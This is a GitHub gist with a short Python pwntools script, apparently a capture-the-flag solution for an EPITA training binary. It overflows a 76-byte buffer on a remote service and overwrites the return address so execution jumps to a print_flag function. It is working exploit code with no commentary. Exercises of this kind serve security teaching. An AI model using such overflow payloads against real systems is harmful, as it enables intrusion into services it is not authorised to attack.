Skip to content

Instantly share code, notes, and snippets.

@0xPwny
Created May 19, 2017 21:10
Show Gist options
  • Save 0xPwny/6bb37373b14f091ed69e34bac0d3792c to your computer and use it in GitHub Desktop.
Save 0xPwny/6bb37373b14f091ed69e34bac0d3792c to your computer and use it in GitHub Desktop.
LSE EPITA - overflow1 exploit
#!/usr/bin/python
# 72: 0804857b 128 FUNC GLOBAL DEFAULT 13 print_flag
from pwn import *
import sys
#con = process("./overflow")
con = remote(sys.argv[1],sys.argv[2])
buff = "A"*76
buff += p32(0x0804857b)
con.sendline(buff)
print con.recvall()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment